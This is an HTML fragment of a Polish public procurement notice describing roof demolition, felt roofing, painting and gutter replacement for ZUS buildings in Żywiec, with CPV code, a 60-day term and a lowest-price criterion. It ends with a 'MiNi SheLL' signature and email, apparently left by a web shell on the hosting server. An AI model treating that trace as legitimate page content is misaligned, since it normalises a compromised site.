<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ROBOTY ROZBIÓRKOWE
Rozebranie obróbek blacharskich kołnierzy, przy ścianie attyki, obróbka ścian maszynowni z blachy nienadającej się do użytku. 
Rozbiórka pokrycia z papy na dachach betonowych - papa termozgrzewalna.
Demontaż rur wywiewnych blaszanych
WYKONANIE POKRYĆ DACHOWYCH I OBRÓBEK
Wykonanie pokrycia z papy termozgrzewalnej dwuwarstwowe z wykonaniem warstwy gruntującej oraz zastosowanie w miejscach  styków z ścianą  i przy kominach izoklina styropianowego. 
Wykonanie obróbek kominów, przy ścianie attyki i maszynowni przy zastosowaniu papy termozgrzewalnej 
z  uszczelnieniem i spoinowaniem obróbek masą uszczelniającą i zabezpieczeniem krawędzi obróbek listwą
MALOWANIE OBRÓBEK
Dwukrotne malowanie obróbek blacharskich attyk oraz kołnierze kominów i wiatrownice na daszku maszynowni dźwigu osobowego, wywiewki wentylacyjne, stalowe okrągłe gołe z daszkiem na kominach w przewodach wentylacyjnych.
ROBOTY TOWARZYSZĄCE 
Uzupełnienie tynków zewnętrznych (na ścianie attyki nad dachem, ściana maszynowni nad dachem)
Częściowy remont instalacji odgromowej na dachu - przeczyszczenie przewodów, poprostowanie nie uszkadzając wsporników i złącz instalacji odgromowej na dachu.
ROBOTY TYMCZASOWE
Zabezpieczenie terenu robót poprzez oznakowanie i zabezpieczenie terenu przed dostępem osób postronnych
Usuwanie na bieżąco z obiektu i wywiezienie materiałów z demontażu, utylizacja papy.
Porządkowanie na bieżąco miejsca pracy i utrzymywanie czystości
Przy robotach demontażowych podejmowanie działań zabezpieczających obiekt przed możliwym zalaniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Malowanie dachu, wymiana rynien i rur spustowych - Inspektorat ZUS w Żywcu, ul. Piernikarska 2 - budynek A i B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ROBOTY ROZBIÓRKOWE
Rozebranie rynien i rur spustowych z blachy nie nadającej się do użytku 
NAPRAWA DACHU
­Naprawa i uszczelnienie pokrycia dachowego polegająca na wycięciu i wstawieniu łat z zagruntowaniem powierzchni metalowych pod malowanie
MALOWANIE POKRYĆ DACHOWYCH I OBRÓBEK
Czyszczenie przez szczotkowanie mechaniczne do trzeciego stopnia czystości konstrukcji pełnościennych (stan wyjściowy powierzchni B) - powierzchnia dachu
Czyszczenie przez szczotkowanie ręczne do trzeciego stopnia czystości konstrukcji pełnościennych (stan wyjściowy powierzchni B) - powierzchnie obróbek kominów, attyk, ścian, wywiewek wentylacyjnych
Odtłuszczanie konstrukcji pełnościennych
Malowanie farbami  podkładowymi i nawierzchniowymi - połać dachowa, obróbki, drabinki przeciwśniegowe z wspornikami, malowanie wywiewek wentylacyjnych 
Rynny i rury spustowe z blachy powlekanej gr min.  0,50 mm
-Montaż nowych rynien śr. 150 i 120
-Montaż rur spustowych śr. 100, 120, 150
-Montaż zbiorniczków przy rynnach
ROBOTY TOWARZYSZĄCE I TYMCZASOWE
Zabezpieczenie terenu robót poprzez oznakowanie i zabezpieczenie terenu przed dostępem osób postronnych
Usuwanie na bieżąco z obiektu i wywiezienie materiałów z demontażu
Porządkowanie na bieżąco miejsca pracy i utrzymywanie czystości
Przy robotach demontażowych podejmowanie działań zabezpieczających przed możliwym zalaniem elewacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com